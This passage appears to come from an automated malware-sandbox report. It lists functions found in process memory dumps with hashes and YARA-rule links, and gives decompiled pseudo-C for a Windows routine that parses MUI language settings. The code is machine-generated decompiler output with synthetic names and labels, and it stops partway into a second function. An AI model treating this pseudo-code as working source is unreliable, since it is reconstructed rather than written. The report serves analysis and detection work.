                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FC30, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                        • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                        • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                        • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A70C40, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                        • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                        • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                        • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FC48, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                        • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                        • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                        • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A71D80, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                        • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                        • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                        • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FD5C, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FE24, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FFFC, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A6FF34, Relevance: .0, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00A98788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E00A98788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A9718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A9718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A9718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A72340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A8E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A7E2A8(_t322,  &_v68, _v16);
								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A8E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A7E2A8(_t322,  &_v68, _t236);
								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A9718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A72340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A8E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A7E2A8(_v12,  &_v68, _v16);
							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A8E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A7E2A8(_t322,  &_v68, _t269);
							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A9718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A72340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A8E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A7E2A8(_v12,  &_v68, _v16);
						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A8E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A7E2A8(_t322,  &_v68, _t296);
						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                        0x00a98788
                                                                                        0x00a98788
                                                                                        0x00a98791
                                                                                        0x00a98794
                                                                                        0x00a98798
                                                                                        0x00a9879b
                                                                                        0x00a9879e
                                                                                        0x00a987a1
                                                                                        0x00a987a4
                                                                                        0x00a987a7
                                                                                        0x00a987aa
                                                                                        0x00a987af
                                                                                        0x00ae1ad3
                                                                                        0x00a98b0a
                                                                                        0x00a98b0d
                                                                                        0x00a98b13
                                                                                        0x00a98b19
                                                                                        0x00a98b1f
                                                                                        0x00a98b25
                                                                                        0x00a98b2b
                                                                                        0x00a98b31
                                                                                        0x00a98b37
                                                                                        0x00a98b3d
                                                                                        0x00a98b46
                                                                                        0x00a98b46
                                                                                        0x00a987c6
                                                                                        0x00a987d0
                                                                                        0x00ae1ae0
                                                                                        0x00ae1ae6
                                                                                        0x00ae1af8
                                                                                        0x00ae1af8
                                                                                        0x00ae1afd
                                                                                        0x00ae1afe
                                                                                        0x00ae1b01
                                                                                        0x00ae1b06
                                                                                        0x00ae1b06
                                                                                        0x00a987d6
                                                                                        0x00a987f2
                                                                                        0x00a987f7
                                                                                        0x00a98807
                                                                                        0x00a9880a
                                                                                        0x00a9880f
                                                                                        0x00a98810
                                                                                        0x00a98813
                                                                                        0x00a98818
                                                                                        0x00a98818
                                                                                        0x00a9882c
                                                                                        0x00a98831
                                                                                        0x00a98838
                                                                                        0x00a98908
                                                                                        0x00a98920
                                                                                        0x00a989f0
                                                                                        0x00a98a08
                                                                                        0x00a98af6
                                                                                        0x00a98af6
                                                                                        0x00a98af8
                                                                                        0x00a98afb
                                                                                        0x00ae1beb
                                                                                        0x00ae1beb
                                                                                        0x00a98b04
                                                                                        0x00ae1bf8
                                                                                        0x00ae1c0e
                                                                                        0x00ae1c13
                                                                                        0x00ae1c16
                                                                                        0x00ae1c16
                                                                                        0x00ae1bf8
                                                                                        0x00000000
                                                                                        0x00a98b04
                                                                                        0x00a98a0e
                                                                                        0x00a98a11
                                                                                        0x00a98a14
                                                                                        0x00a98a15
                                                                                        0x00a98a18
                                                                                        0x00a98a22
                                                                                        0x00a98b59
                                                                                        0x00a98a28
                                                                                        0x00a98a3c
                                                                                        0x00a98a3c
                                                                                        0x00a98a42
                                                                                        0x00ae1bb0
                                                                                        0x00ae1b11
                                                                                        0x00ae1b11
                                                                                        0x00000000
                                                                                        0x00a98a48
                                                                                        0x00a98a51
                                                                                        0x00a98a5b
                                                                                        0x00a98a5e
                                                                                        0x00a98a61
                                                                                        0x00a98a69
                                                                                        0x00a98a69
                                                                                        0x00a98a6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00a98a74
                                                                                        0x00a98a7c
                                                                                        0x00a98a7d
                                                                                        0x00a98a91
                                                                                        0x00a98a93
                                                                                        0x00a98a93
                                                                                        0x00a98a98
                                                                                        0x00a98a9b
                                                                                        0x00a98aa1
                                                                                        0x00a98aa1
                                                                                        0x00a98aa4
                                                                                        0x00a98aaa
                                                                                        0x00a98ab1
                                                                                        0x00a98ac5
                                                                                        0x00a98ac7
                                                                                        0x00a98ac7
                                                                                        0x00a98ac5
                                                                                        0x00a98ace
                                                                                        0x00ae1bc9
                                                                                        0x00ae1bce
                                                                                        0x00ae1bd2
                                                                                        0x00ae1bd2
                                                                                        0x00a98ad8
                                                                                        0x00a98aeb
                                                                                        0x00a98aeb
                                                                                        0x00a98af0
                                                                                        0x00a98af4
                                                                                        0x00000000
                                                                                        0x00a98af4
                                                                                        0x00a98a42
                                                                                        0x00a98926
                                                                                        0x00a98929
                                                                                        0x00a9892c
                                                                                        0x00a9892d
                                                                                        0x00a98930
                                                                                        0x00a98935
                                                                                        0x00a9893a
                                                                                        0x00a98b51
                                                                                        0x00a98940
                                                                                        0x00a98954
                                                                                        0x00a98954
                                                                                        0x00a9895a
                                                                                        0x00ae1b63
                                                                                        0x00000000
                                                                                        0x00a98960
                                                                                        0x00a98969
                                                                                        0x00a98973
                                                                                        0x00a98976
                                                                                        0x00a98979
                                                                                        0x00a9897e
                                                                                        0x00a98981
                                                                                        0x00a98981
                                                                                        0x00a98986
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ae1b6e
                                                                                        0x00ae1b74
                                                                                        0x00ae1b7b
                                                                                        0x00ae1b8f
                                                                                        0x00ae1b91
                                                                                        0x00ae1b91
                                                                                        0x00ae1b99
                                                                                        0x00ae1b9c
                                                                                        0x00ae1ba2
                                                                                        0x00ae1ba2
                                                                                        0x00a9898c
                                                                                        0x00a98992
                                                                                        0x00a98999
                                                                                        0x00a989ad
                                                                                        0x00ae1ba8
                                                                                        0x00ae1ba8
                                                                                        0x00a989ad
                                                                                        0x00a989b6
                                                                                        0x00a989c8
                                                                                        0x00a989cd
                                                                                        0x00a989d0
                                                                                        0x00a989d0
                                                                                        0x00a989d6
                                                                                        0x00a989e8
                                                                                        0x00a989e8
                                                                                        0x00a989ed
                                                                                        0x00000000
                                                                                        0x00a989ed
                                                                                        0x00a9895a
                                                                                        0x00a9883e
                                                                                        0x00a98841
                                                                                        0x00a98844
                                                                                        0x00a98845
                                                                                        0x00a98848
                                                                                        0x00a9884d
                                                                                        0x00a98852
                                                                                        0x00a98b49
                                                                                        0x00a98858
                                                                                        0x00a9886c
                                                                                        0x00a9886c
                                                                                        0x00a98872
                                                                                        0x00ae1b0e
                                                                                        0x00000000
                                                                                        0x00a98878
                                                                                        0x00a98881
                                                                                        0x00a9888b
                                                                                        0x00a9888e
                                                                                        0x00a98891
                                                                                        0x00a98896
                                                                                        0x00a98899
                                                                                        0x00a98899
                                                                                        0x00a9889e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00ae1b21
                                                                                        0x00ae1b27
                                                                                        0x00ae1b2e
                                                                                        0x00ae1b42
                                                                                        0x00ae1b44
                                                                                        0x00ae1b44
                                                                                        0x00ae1b4c
                                                                                        0x00ae1b4f
                                                                                        0x00ae1b55
                                                                                        0x00ae1b55
                                                                                        0x00a988a4
                                                                                        0x00a988aa
                                                                                        0x00a988b1
                                                                                        0x00a988c5
                                                                                        0x00ae1b5b
                                                                                        0x00ae1b5b
                                                                                        0x00a988c5
                                                                                        0x00a988ce
                                                                                        0x00a988e0
                                                                                        0x00a988e5
                                                                                        0x00a988e8
                                                                                        0x00a988e8
                                                                                        0x00a988ee
                                                                                        0x00a98900
                                                                                        0x00a98900
                                                                                        0x00a98905
                                                                                        0x00000000
                                                                                        0x00a98905

                                                                                        APIs
                                                                                        Strings
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                                                        • WindowsExcludedProcs, xrefs: 00A987C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.541871087.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                                        • Associated: 00000008.00000002.541852547.0000000000A50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542131748.0000000000B40000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542137785.0000000000B50000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542143345.0000000000B54000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542151326.0000000000B57000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542158209.0000000000B60000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000008.00000002.542201213.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: _wcspbrk
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 402402107-258546922
                                                                                        • Opcode ID: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                                                        • Instruction ID: cc9c08e51eaef2e9edfab93a9b0e80f7bf7f0d6c999efbb6c97ac7f7e2a2df57
                                                                                        • Opcode Fuzzy Hash: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                                                        • Instruction Fuzzy Hash: FBF1D6B2E00249EFCF11EF95CA819EEB7F9FF09300F15846AE505A7211EB359A45DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00AB13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 38%
                                                                                        			E00AB13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
